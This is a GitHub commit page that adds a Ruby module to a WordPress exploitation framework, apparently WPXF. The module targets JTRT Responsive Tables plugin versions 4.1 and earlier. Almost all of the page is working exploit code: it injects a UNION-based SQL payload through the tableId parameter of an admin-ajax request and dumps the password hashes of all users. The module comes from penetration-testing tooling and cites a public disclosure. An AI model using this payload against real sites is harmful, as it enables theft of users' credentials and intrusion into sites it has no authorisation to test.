Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 7b3ecf3

Browse files
committed
Add JTRT Responsive Tables <= 4.1 hash dump
1 parent 8830859 commit 7b3ecf3

File tree

1 file changed

+69
-0
lines changed

1 file changed

+69
-0
lines changed
Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
# frozen_string_literal: true
2+
3+
class Wpxf::Auxiliary::JtrtResponsiveTablesHashDump < Wpxf::Module
4+
include Wpxf::WordPress::HashDump
5+
6+
def initialize
7+
super
8+
9+
update_info(
10+
name: 'JTRT Responsive Tables <= 4.1 Authenticated Hash Dump',
11+
desc: %(
12+
JTRT Responsive Tables <= 4.1 suffers from an SQL injection vulnerability
13+
which is exploitable by registered users of any level.
14+
15+
This module utilises the vulnerability to dump the hashed passwords
16+
of all users in the database.
17+
),
18+
author: [
19+
'Lenon Leite', # Disclosure
20+
'Rob Carr <rob[at]rastating.com>' # WPXF module
21+
],
22+
references: [
23+
['WPVDB', '8953'],
24+
['URL', 'http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/']
25+
],
26+
date: 'Nov 11 2017'
27+
)
28+
end
29+
30+
def check
31+
check_plugin_version_from_readme('jtrt-responsive-tables', '4.1.1')
32+
end
33+
34+
def requires_authentication
35+
true
36+
end
37+
38+
def reveals_one_row_per_request
39+
true
40+
end
41+
42+
def hashdump_request_method
43+
:post
44+
end
45+
46+
def hashdump_request_params
47+
{
48+
'action' => 'get_old_table'
49+
}
50+
end
51+
52+
def hashdump_request_body
53+
{
54+
'tableId' => "-#{Utility::Text.rand_numeric(2)} UNION #{hashdump_sql_statement} #"
55+
}
56+
end
57+
58+
def hashdump_visible_field_index
59+
2
60+
end
61+
62+
def hashdump_number_of_cols
63+
5
64+
end
65+
66+
def vulnerable_url
67+
wordpress_url_admin_ajax
68+
end
69+
end

0 commit comments

Comments
 (0)